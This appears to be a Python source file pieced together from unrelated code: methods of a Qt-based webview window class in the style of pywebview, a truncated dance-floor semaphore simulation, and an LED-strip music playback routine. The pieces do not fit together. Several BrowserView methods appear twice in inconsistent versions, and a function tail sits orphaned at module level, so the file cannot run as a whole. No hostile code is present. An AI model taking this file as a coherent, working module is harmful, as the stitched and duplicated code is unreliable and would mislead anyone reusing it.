        if not self.text_select:
            script = disable_text_select.replace('\n', '')
            try:  # QT < 5.6
                self.view.page().mainFrame().evaluateJavaScript(script)
            except AttributeError:
                self.view.page().runJavaScript(script)

    def set_title(self, title):
        self.set_title_trigger.emit(title)

    def get_current_url(self):
        # Blocks until on_current_url() has run on the main thread.
        self.loaded.wait()
        self.current_url_trigger.emit()
        self._current_url_semaphore.acquire()

        return self._current_url

    def load_url(self, url):
        self.loaded.clear()
        self.load_url_trigger.emit(url)

    def load_html(self, content, base_uri):
        self.loaded.clear()
        self.html_trigger.emit(content, base_uri)

    def create_file_dialog(self, dialog_type, directory, allow_multiple, save_filename, file_filter):
        # Blocks until on_file_dialog() releases the semaphore.
        self.dialog_trigger.emit(dialog_type, directory, allow_multiple,
                                 save_filename, file_filter)
        self._file_name_semaphore.acquire()

        if dialog_type == FOLDER_DIALOG:
            file_names = (self._file_name, )
        elif dialog_type == SAVE_DIALOG or not allow_multiple:
            file_names = (self._file_name[0], )
        else:
            file_names = tuple(self._file_name[0])

        # Check if we got an empty tuple, or a tuple with empty string
        if len(file_names) == 0 or len(file_names[0]) == 0:
            return None
        else:
            return file_names

    def destroy_(self):
        self.destroy_trigger.emit()

    def toggle_fullscreen(self):
        self.fullscreen_trigger.emit()

    def set_window_size(self, width, height):
        self.window_size_trigger.emit(width, height)

    def move_window(self, x, y):
        self.window_move_trigger.emit(x, y)

    def evaluate_js(self, script):
        # Each pending evaluation gets its own semaphore/result slot keyed
        # by a fresh uuid, so concurrent callers do not collide.
        self.loaded.wait()
        result_semaphore = Semaphore(0)
        unique_id = uuid1().hex
        self._js_results[unique_id] = {
            'semaphore': result_semaphore,
            'result': ''
        }

        self.evaluate_js_trigger.emit(script, unique_id)
        result_semaphore.acquire()

        result = deepcopy(self._js_results[unique_id]['result'])
        del self._js_results[unique_id]

        return result

    def _set_js_api(self):
        # Inject the pywebview JS API into the loaded page, then mark the
        # window as loaded.
        def _register_window_object():
            frame.addToJavaScriptWindowObject('external', self.js_bridge)

        code = 'qtwebengine' if is_webengine else 'qtwebkit'
        script = parse_api_js(self.js_bridge.window.js_api, code)

        if is_webengine:
            qwebchannel_js = QtCore.QFile('://qtwebchannel/qwebchannel.js')
            if qwebchannel_js.open(QtCore.QFile.ReadOnly):
                source = bytes(qwebchannel_js.readAll()).decode('utf-8')
                self.view.page().runJavaScript(source)
                self.channel.registerObject('external', self.js_bridge)
                qwebchannel_js.close()
        else:
            frame = self.view.page().mainFrame()
            _register_window_object()

        try:  # < QT 5.6
            self.view.page().mainFrame().evaluateJavaScript(script)
        except AttributeError:
            self.view.page().runJavaScript(script)

        self.loaded.set()

    @staticmethod
    def _convert_string(result):
        # QJsonValue (QtWebEngine) -> Python str; plain strings pass through.
        try:
            if result is None or result.isNull():
                return None

            result = result.toString()  # QJsonValue conversion
        except AttributeError:
            pass

        return convert_string(result)

    @staticmethod
    # A simple function to obtain an unused localhost port from the os and return it
    def _get_free_port():
        s = socket()
        s.bind(('localhost', 0))
        port = str(s.getsockname()[1])
        s.close()

        return port

    @staticmethod
    # Receive func from subthread and execute it on the main thread
    def on_create_window(func):
        func()
# NOTE(review): the four statements below are the truncated tail of a
# follower/leader routine whose `def` lies outside this chunk — presumably the
# "leave the floor" critical section guarded by floorMutex2.  Kept verbatim.
if nDancers == 0:
    emptyFloor.release()
print('\n Number of dancers on floor are: %d.\n' % nDancers)
floorMutex2.release()


if __name__ == '__main__':
    # Dance-floor simulation driver: spawn leader and follower threads, then
    # act as the band leader cycling through songs forever.
    no_of_leaders=int(input('Enter the number of leaders: '))
    no_of_followers=int(input('Enter the number of followers: '))

    ldrthrd = [Thread(target=leaders, args=[i]) for i in range(no_of_leaders)]
    for lt in ldrthrd:
        lt.start()

    flrthrd = [Thread(target=followers, args=[i]) for i in range(no_of_followers)]
    for ft in flrthrd:
        ft.start()

    # Band leader loop: for each song, open the floor (emptyFloor) and start
    # the dancing round (bandLeaderBarrier), play for 5 seconds, then take
    # both back to stop the round and wait for the floor to clear.
    for music in cycle(['waltz', 'tango', 'foxtrot']):
        print("** Band leader started playing the music %s **" %(music))
        emptyFloor.release()
        bandLeaderBarrier.release()
        sleep(5)
        bandLeaderBarrier.acquire()
        emptyFloor.acquire()  # blocks until the last dancer releases it
        sleep(random())
        # floorEmpty.release()
        print("** Band leader stopped playing the music %s **" %(music))
class BrowserView(QMainWindow):
    """Qt-backed browser window (one instance per pywebview window).

    All GUI work must happen on the Qt main thread, so the public API
    methods (load_url, evaluate_js, create_file_dialog, ...) emit
    pyqtSignal "triggers"; the connected ``on_*`` slots run on the main
    thread and hand results back to the caller through semaphores.
    """

    # All open windows, keyed by uid.
    instances = {}
    inspector_port = None  # The localhost port at which the Remote debugger listens

    # Cross-thread triggers; each is connected to the matching on_* slot.
    create_window_trigger = QtCore.pyqtSignal(object)
    set_title_trigger = QtCore.pyqtSignal(str)
    load_url_trigger = QtCore.pyqtSignal(str)
    html_trigger = QtCore.pyqtSignal(str, str)
    dialog_trigger = QtCore.pyqtSignal(int, str, bool, str, str)
    destroy_trigger = QtCore.pyqtSignal()
    hide_trigger = QtCore.pyqtSignal()
    show_trigger = QtCore.pyqtSignal()
    fullscreen_trigger = QtCore.pyqtSignal()
    window_size_trigger = QtCore.pyqtSignal(int, int)
    window_move_trigger = QtCore.pyqtSignal(int, int)
    window_minimize_trigger = QtCore.pyqtSignal()
    window_restore_trigger = QtCore.pyqtSignal()
    current_url_trigger = QtCore.pyqtSignal()
    evaluate_js_trigger = QtCore.pyqtSignal(str, str)
    on_top_trigger = QtCore.pyqtSignal(bool)

    class JSBridge(QtCore.QObject):
        """Object exposed to page JavaScript as ``external``; routes JS
        calls into Python via js_bridge_call."""
        # QtWebEngine delivers JSON values; QtWebKit delivers plain strings.
        qtype = QtCore.QJsonValue if is_webengine else str

        def __init__(self):
            super(BrowserView.JSBridge, self).__init__()

        @QtCore.pyqtSlot(str, qtype, str, result=str)
        def call(self, func_name, param, value_id):
            func_name = BrowserView._convert_string(func_name)
            param = BrowserView._convert_string(param)

            return js_bridge_call(self.window, func_name, json.loads(param),
                                  value_id)

    class WebView(QWebView):
        def __init__(self, parent=None):
            super(BrowserView.WebView, self).__init__(parent)

            # Easy-drag frameless windows intercept mouse events app-wide to
            # implement window dragging.
            if parent.frameless and parent.easy_drag:
                QApplication.instance().installEventFilter(self)
                self.setMouseTracking(True)

        def contextMenuEvent(self, event):
            menu = self.page().createStandardContextMenu()

            # If 'Inspect Element' is present in the default context menu, it
            # means the inspector is already up and running.
            for i in menu.actions():
                if i.text() == "Inspect Element":
                    break
            else:
                # Inspector is not up yet, so create a pseudo 'Inspect Element'
                # menu that will fire it up.
                inspect_element = QAction("Inspect Element", menu)
                inspect_element.triggered.connect(self.show_inspector)
                menu.addAction(inspect_element)

            menu.exec_(event.globalPos())

        # Create a new webview window pointing at the Remote debugger server
        def show_inspector(self):
            uid = self.parent().uid + "-inspector"
            try:
                # If inspector already exists, bring it to the front
                BrowserView.instances[uid].raise_()
                BrowserView.instances[uid].activateWindow()
            except KeyError:
                title = "Web Inspector - {}".format(self.parent().title)
                url = "http://localhost:{}".format(BrowserView.inspector_port)
                window = Window(
                    "web_inspector",
                    title,
                    url,
                    "",
                    700,
                    500,
                    None,
                    None,
                    True,
                    False,
                    (300, 200),
                    False,
                    False,
                    False,
                    False,
                    False,
                    "#fff",
                    None,
                    False,
                    False,
                )

                inspector = BrowserView(window)
                inspector.show()

        def mousePressEvent(self, event):
            # Remember the press offset for frameless-window dragging.
            if event.button() == QtCore.Qt.LeftButton:
                self.drag_pos = (event.globalPos() -
                                 self.parent().frameGeometry().topLeft())

            event.accept()

        def mouseMoveEvent(self, event):
            parent = self.parent()
            if (parent.frameless and parent.easy_drag
                    and int(event.buttons()) == 1):  # left button is pressed
                parent.move(event.globalPos() - self.drag_pos)

        def eventFilter(self, object, event):
            # Forward mouse events from child widgets so dragging works
            # anywhere in the frameless window; never consume the event.
            if object.parent() == self:
                if event.type() == QtCore.QEvent.MouseMove:
                    self.mouseMoveEvent(event)
                elif event.type() == QtCore.QEvent.MouseButtonPress:
                    self.mousePressEvent(event)

            return False

    # New-window-requests handler for Qt 5.5+ only
    class NavigationHandler(QWebPage):
        def __init__(self, parent=None):
            super(BrowserView.NavigationHandler, self).__init__(parent)

        def acceptNavigationRequest(self, url, type, is_main_frame):
            # Open new-window navigation in the system browser instead.
            webbrowser.open(url.toString(), 2, True)
            return False

    class WebPage(QWebPage):
        def __init__(self, parent=None):
            super(BrowserView.WebPage, self).__init__(parent)
            if is_webengine:
                self.featurePermissionRequested.connect(
                    self.onFeaturePermissionRequested)
                self.nav_handler = BrowserView.NavigationHandler(self)
            else:
                self.nav_handler = None

        if is_webengine:
            # Auto-grant media capture permissions; deny everything else.
            def onFeaturePermissionRequested(self, url, feature):
                if feature in (
                        QWebPage.MediaAudioCapture,
                        QWebPage.MediaVideoCapture,
                        QWebPage.MediaAudioVideoCapture,
                ):
                    self.setFeaturePermission(url, feature,
                                              QWebPage.PermissionGrantedByUser)
                else:
                    self.setFeaturePermission(url, feature,
                                              QWebPage.PermissionDeniedByUser)
        else:
            # QtWebKit path: frame is None for new-window requests.
            def acceptNavigationRequest(self, frame, request, type):
                if frame is None:
                    webbrowser.open(request.url().toString(), 2, True)
                    return False
                return True

        def userAgentForUrl(self, url):
            user_agent = settings.get("user_agent") or _user_agent
            if user_agent:
                return user_agent
            else:
                return super().userAgentForUrl(url)

        def createWindow(self, type):
            return self.nav_handler

    def __init__(self, window):
        super(BrowserView, self).__init__()
        BrowserView.instances[window.uid] = self
        self.uid = window.uid
        self.pywebview_window = window

        self.js_bridge = BrowserView.JSBridge()
        self.js_bridge.window = window

        self.is_fullscreen = False
        self.confirm_close = window.confirm_close
        self.text_select = window.text_select

        # Released by the on_* slots to unblock the calling thread.
        self._file_name_semaphore = Semaphore(0)
        self._current_url_semaphore = Semaphore(0)

        self.loaded = window.loaded
        self.shown = window.shown

        self._js_results = {}
        self._current_url = None
        self._file_name = None

        self.resize(window.initial_width, window.initial_height)
        self.title = window.title
        self.setWindowTitle(window.title)

        # Set window background color
        self.background_color = QColor()
        self.background_color.setNamedColor(window.background_color)
        palette = self.palette()
        palette.setColor(self.backgroundRole(), self.background_color)
        self.setPalette(palette)

        if not window.resizable:
            self.setFixedSize(window.initial_width, window.initial_height)

        self.setMinimumSize(window.min_size[0], window.min_size[1])

        self.frameless = window.frameless
        self.easy_drag = window.easy_drag

        flags = self.windowFlags()
        if self.frameless:
            flags = flags | QtCore.Qt.FramelessWindowHint

        if window.on_top:
            flags = flags | QtCore.Qt.WindowStaysOnTopHint

        self.setWindowFlags(flags)

        self.view = BrowserView.WebView(self)

        if is_webengine:
            # Allow media streams without a permission prompt UI.
            os.environ["QTWEBENGINE_CHROMIUM_FLAGS"] = "--use-fake-ui-for-media-stream --enable-features=AutoplayIgnoreWebAudio"

        if _debug and is_webengine:
            # Initialise Remote debugging (need to be done only once)
            if not BrowserView.inspector_port:
                BrowserView.inspector_port = BrowserView._get_debug_port()
                os.environ["QTWEBENGINE_REMOTE_DEBUGGING"] = BrowserView.inspector_port
        else:
            self.view.setContextMenuPolicy(
                QtCore.Qt.NoContextMenu)  # disable right click context menu

        self.view.setPage(BrowserView.WebPage(self.view))
        self.view.page().loadFinished.connect(self.on_load_finished)

        self.setCentralWidget(self.view)

        # Wire every cross-thread trigger to its main-thread slot.
        self.create_window_trigger.connect(BrowserView.on_create_window)
        self.load_url_trigger.connect(self.on_load_url)
        self.html_trigger.connect(self.on_load_html)
        self.dialog_trigger.connect(self.on_file_dialog)
        self.destroy_trigger.connect(self.on_destroy_window)
        self.show_trigger.connect(self.on_show_window)
        self.hide_trigger.connect(self.on_hide_window)
        self.fullscreen_trigger.connect(self.on_fullscreen)
        self.window_size_trigger.connect(self.on_window_size)
        self.window_move_trigger.connect(self.on_window_move)
        self.window_minimize_trigger.connect(self.on_window_minimize)
        self.window_restore_trigger.connect(self.on_window_restore)
        self.current_url_trigger.connect(self.on_current_url)
        self.evaluate_js_trigger.connect(self.on_evaluate_js)
        self.set_title_trigger.connect(self.on_set_title)
        self.on_top_trigger.connect(self.on_set_on_top)

        if is_webengine and platform.system() != "OpenBSD":
            self.channel = QWebChannel(self.view.page())
            self.view.page().setWebChannel(self.channel)

        if window.fullscreen:
            self.toggle_fullscreen()

        if window.url is not None:
            self.view.setUrl(QtCore.QUrl(window.url))
        elif window.html:
            self.view.setHtml(window.html, QtCore.QUrl(""))
        else:
            self.view.setHtml(default_html, QtCore.QUrl(""))

        if window.initial_x is not None and window.initial_y is not None:
            self.move(window.initial_x, window.initial_y)
        else:
            # Center the window on the available desktop geometry.
            center = (QApplication.desktop().availableGeometry().center() -
                      self.rect().center())
            self.move(center.x(), center.y())

        if not window.minimized:
            self.activateWindow()
            self.raise_()

        self.shown.set()

    def on_set_title(self, title):
        self.setWindowTitle(title)

    def on_file_dialog(self, dialog_type, directory, allow_multiple,
                       save_filename, file_filter):
        # Runs on the main thread; stores the result and releases the
        # semaphore create_file_dialog() is blocked on.
        if dialog_type == FOLDER_DIALOG:
            self._file_name = QFileDialog.getExistingDirectory(
                self, localization["linux.openFolder"],
                options=QFileDialog.ShowDirsOnly)
        elif dialog_type == OPEN_DIALOG:
            if allow_multiple:
                self._file_name = QFileDialog.getOpenFileNames(
                    self, localization["linux.openFiles"], directory,
                    file_filter)
            else:
                self._file_name = QFileDialog.getOpenFileName(
                    self, localization["linux.openFile"], directory,
                    file_filter)
        elif dialog_type == SAVE_DIALOG:
            if directory:
                save_filename = os.path.join(str(directory), str(save_filename))

            self._file_name = QFileDialog.getSaveFileName(
                self, localization["global.saveFile"], save_filename,
                file_filter)

        self._file_name_semaphore.release()

    def on_current_url(self):
        url = BrowserView._convert_string(self.view.url().toString())
        # Internal data: URLs are reported as "no URL loaded".
        self._current_url = (None if url == ""
                             or url.startswith("data:text/html") else url)
        self._current_url_semaphore.release()

    def on_load_url(self, url):
        self.view.setUrl(QtCore.QUrl(url))

    def on_load_html(self, content, base_uri):
        self.view.setHtml(content, QtCore.QUrl(base_uri))

    def on_set_on_top(self, top):
        flags = self.windowFlags()
        if top:
            self.setWindowFlags(flags | QtCore.Qt.WindowStaysOnTopHint)
        else:
            self.setWindowFlags(flags & ~QtCore.Qt.WindowStaysOnTopHint)

        # Changing window flags hides the window; show it again.
        self.show()

    def closeEvent(self, event):
        self.pywebview_window.closing.set()

        if self.confirm_close:
            reply = QMessageBox.question(
                self,
                self.title,
                localization["global.quitConfirmation"],
                QMessageBox.Yes,
                QMessageBox.No,
            )

            if reply == QMessageBox.No:
                event.ignore()
                return

        event.accept()
        BrowserView.instances[self.uid].close()
        del BrowserView.instances[self.uid]

        if self.pywebview_window in windows:
            windows.remove(self.pywebview_window)

        self.pywebview_window.closed.set()

        # Last window closed: shut down the Qt application.
        if len(BrowserView.instances) == 0:
            self.hide()
            _app.exit()

    def on_show_window(self):
        self.show()

    def on_hide_window(self):
        self.hide()

    def on_destroy_window(self):
        self.close()

    def on_fullscreen(self):
        if self.is_fullscreen:
            self.showNormal()
        else:
            self.showFullScreen()

        self.is_fullscreen = not self.is_fullscreen

    def on_window_size(self, width, height):
        self.setFixedSize(width, height)

    def on_window_move(self, x, y):
        self.move(x, y)

    def on_window_minimize(self):
        self.setWindowState(QtCore.Qt.WindowMinimized)

    def on_window_restore(self):
        self.setWindowState(QtCore.Qt.WindowNoState)
        self.raise_()
        self.activateWindow()

    def on_evaluate_js(self, script, uuid):
        def return_result(result):
            # Normalise the JS result: None/'null' -> None, '' kept as-is,
            # anything else parsed as JSON; then wake the waiting thread.
            result = BrowserView._convert_string(result)
            uuid_ = BrowserView._convert_string(uuid)

            js_result = self._js_results[uuid_]
            js_result["result"] = (
                None if result is None or result == "null" else result
                if result == "" else json.loads(result))
            js_result["semaphore"].release()

        try:
            # Qt 5.6+ (QtWebEngine): async evaluation with a callback.
            self.view.page().runJavaScript(script, return_result)
        except AttributeError:  # < Qt5.6
            result = self.view.page().mainFrame().evaluateJavaScript(script)
            return_result(result)
        except Exception as e:
            logger.exception(e)

    def on_load_finished(self):
        self._set_js_api()

        if not self.text_select:
            script = disable_text_select.replace("\n", "")
            try:
                self.view.page().runJavaScript(script)
            except:  # QT < 5.6
                self.view.page().mainFrame().evaluateJavaScript(script)

    def set_title(self, title):
        self.set_title_trigger.emit(title)

    def get_current_url(self):
        # Blocks until on_current_url() has run on the main thread.
        self.loaded.wait()
        self.current_url_trigger.emit()
        self._current_url_semaphore.acquire()

        return self._current_url

    def load_url(self, url):
        self.loaded.clear()
        self.load_url_trigger.emit(url)

    def load_html(self, content, base_uri):
        self.loaded.clear()
        self.html_trigger.emit(content, base_uri)

    def create_file_dialog(self, dialog_type, directory, allow_multiple,
                           save_filename, file_filter):
        # Blocks until on_file_dialog() releases the semaphore.
        self.dialog_trigger.emit(dialog_type, directory, allow_multiple,
                                 save_filename, file_filter)
        self._file_name_semaphore.acquire()

        if dialog_type == FOLDER_DIALOG:
            file_names = (self._file_name, )
        elif dialog_type == SAVE_DIALOG or not allow_multiple:
            file_names = (self._file_name[0], )
        else:
            file_names = tuple(self._file_name[0])

        # Check if we got an empty tuple, or a tuple with empty string
        if len(file_names) == 0 or len(file_names[0]) == 0:
            return None
        else:
            return file_names

    def hide_(self):
        self.hide_trigger.emit()

    def show_(self):
        self.show_trigger.emit()

    def destroy_(self):
        self.destroy_trigger.emit()

    def toggle_fullscreen(self):
        self.fullscreen_trigger.emit()

    def resize_(self, width, height):
        self.window_size_trigger.emit(width, height)

    def move_window(self, x, y):
        self.window_move_trigger.emit(x, y)

    def minimize(self):
        self.window_minimize_trigger.emit()

    def restore(self):
        self.window_restore_trigger.emit()

    def set_on_top(self, top):
        self.on_top_trigger.emit(top)

    def evaluate_js(self, script):
        # Each pending evaluation gets its own semaphore/result slot keyed
        # by a fresh uuid, so concurrent callers do not collide.
        self.loaded.wait()
        result_semaphore = Semaphore(0)
        unique_id = uuid1().hex
        self._js_results[unique_id] = {
            "semaphore": result_semaphore,
            "result": ""
        }

        self.evaluate_js_trigger.emit(script, unique_id)
        result_semaphore.acquire()

        result = deepcopy(self._js_results[unique_id]["result"])
        del self._js_results[unique_id]

        return result

    def _set_js_api(self):
        # Inject the pywebview JS API into the loaded page, then mark the
        # window as loaded.
        def _register_window_object():
            frame.addToJavaScriptWindowObject("external", self.js_bridge)

        code = "qtwebengine" if is_webengine else "qtwebkit"
        script = parse_api_js(self.js_bridge.window, code)

        if is_webengine:
            qwebchannel_js = QtCore.QFile("://qtwebchannel/qwebchannel.js")
            if qwebchannel_js.open(QtCore.QFile.ReadOnly):
                source = bytes(qwebchannel_js.readAll()).decode("utf-8")
                self.view.page().runJavaScript(source)
                self.channel.registerObject("external", self.js_bridge)
                qwebchannel_js.close()
        else:
            frame = self.view.page().mainFrame()
            _register_window_object()

        try:
            self.view.page().runJavaScript(script)
        except AttributeError:  # < QT 5.6
            self.view.page().mainFrame().evaluateJavaScript(script)

        self.loaded.set()

    @staticmethod
    def _convert_string(result):
        # QJsonValue (QtWebEngine) -> Python str; plain strings pass through.
        try:
            if result is None or result.isNull():
                return None

            result = result.toString()  # QJsonValue conversion
        except AttributeError:
            pass

        return convert_string(result)

    @staticmethod
    def _get_debug_port():
        """
        Check if default debug port 8228 is available, increment it by 1
        until a port is available.
        :return: port: str
        """
        port_available = False
        port = 8228

        while not port_available:
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.bind(("localhost", port))
                port_available = True
            except:
                port_available = False
                logger.warning("Port %s is in use" % port)
                port += 1
            finally:
                sock.close()

        return str(port)

    @staticmethod
    # Receive func from subthread and execute it on the main thread
    def on_create_window(func):
        func()
def _wota_playback(self):
    """Play every track in ``self.playlist`` in order: start audio via mpv,
    drive the LED strip tick-by-tick in time with the song's pattern list,
    then clean up and advance to the next track.  Resets state to IDLE when
    the playlist is exhausted or playback is stopped.
    """
    while self.current_track < len(self.playlist):
        song, _ = self.playlist[self.current_track]
        self._load_file(song)
        if self.player:
            self.player.terminate()
        # NOTE(review): hwdec='mmal' suggests Raspberry Pi hardware — confirm.
        self.player = MPV(vid='no', hwdec='mmal', keep_open='yes',
                          volume=self.volume, log_handler=self._mpv_log)
        self.player.play(self.song['filename'])

        # wait for mpv to actually start playing: the first non-None
        # 'time-pos' property update releases the semaphore.
        playback_lock = Semaphore(value=0)

        def observer(name, val):
            if val is not None:
                playback_lock.release()

        self.player.observe_property('time-pos', observer)
        playback_lock.acquire()
        self.player.unobserve_property('time-pos', observer)

        start = time.time()
        ticks = 0
        # drift = 0
        bpm = 120  # default tempo until a pattern overrides it
        cur_colors = {
            'left': BladeColor.YOSHIKO,
            'center': BladeColor.YOSHIKO,
            'right': BladeColor.YOSHIKO,
        }
        # Optional delay (ms) between audio start and the first LED tick.
        initial_offset = self.song.get('initial_offset', 0)
        if initial_offset:
            time.sleep((start + initial_offset / 1000) - time.time())
        last_tick = time.perf_counter()

        # play led patterns
        for pattern in self.song['patterns']:
            if 'bpm' in pattern:
                bpm = pattern['bpm']
            # Update per-position colors; a list value becomes a tuple of
            # BladeColor members, a string a single member.  Unknown color
            # names are silently skipped.
            for k in ['left', 'center', 'right']:
                if k in pattern:
                    if isinstance(pattern[k], list):
                        colors = []
                        for c in pattern[k]:
                            color = c.upper()
                            if color in BladeColor.__members__:
                                colors.append(BladeColor[color])
                        cur_colors[k] = tuple(colors)
                    else:
                        color = pattern[k].upper()
                        if color in BladeColor.__members__:
                            cur_colors[k] = BladeColor[color]
            kwargs = pattern.get('kwargs', {})
            kwargs.update(cur_colors)
            wota = WOTA_TYPE[pattern['type']](bpm=bpm, strip=self.strip,
                                              **kwargs)
            count = pattern.get('count', 1)
            for i in range(count):
                for _ in range(len(wota)):
                    # Abort immediately if a stop was requested.
                    if self._stopped.is_set():
                        return
                    # Schedule against absolute tick times so sleep jitter
                    # does not accumulate as drift.
                    next_tick = last_tick + wota.tick_s
                    # if i == 0 or i == count - 1:
                    #     loop = False
                    # else:
                    #     loop = True
                    loop = True
                    wota.tick(loop=loop)
                    diff = next_tick - time.perf_counter()
                    last_tick = next_tick
                    # drift = 0
                    if diff > 0:
                        time.sleep(diff)
                    # elif diff < 0:
                    #     drift = diff
                    ticks += 1

        with self.player._playback_cond:
            # wait for mpv to reach the end of the audio file or 5 seconds,
            # whichever comes first
            self.player._playback_cond.wait(5)

        # end of song, setup next track: stop mpv and blank the LED strip.
        self.player.terminate()
        self.player = None
        for i in range(self.strip.numPixels()):
            self.strip.setPixelColor(i, BladeColor.NONE.value)
        self.strip.show()
        self.current_track += 1

    # Playlist finished (or empty): rewind and report IDLE.
    self.current_track = 0
    self._status_lock.acquire()
    self.status = WotabagStatus.IDLE
    self._status_lock.release()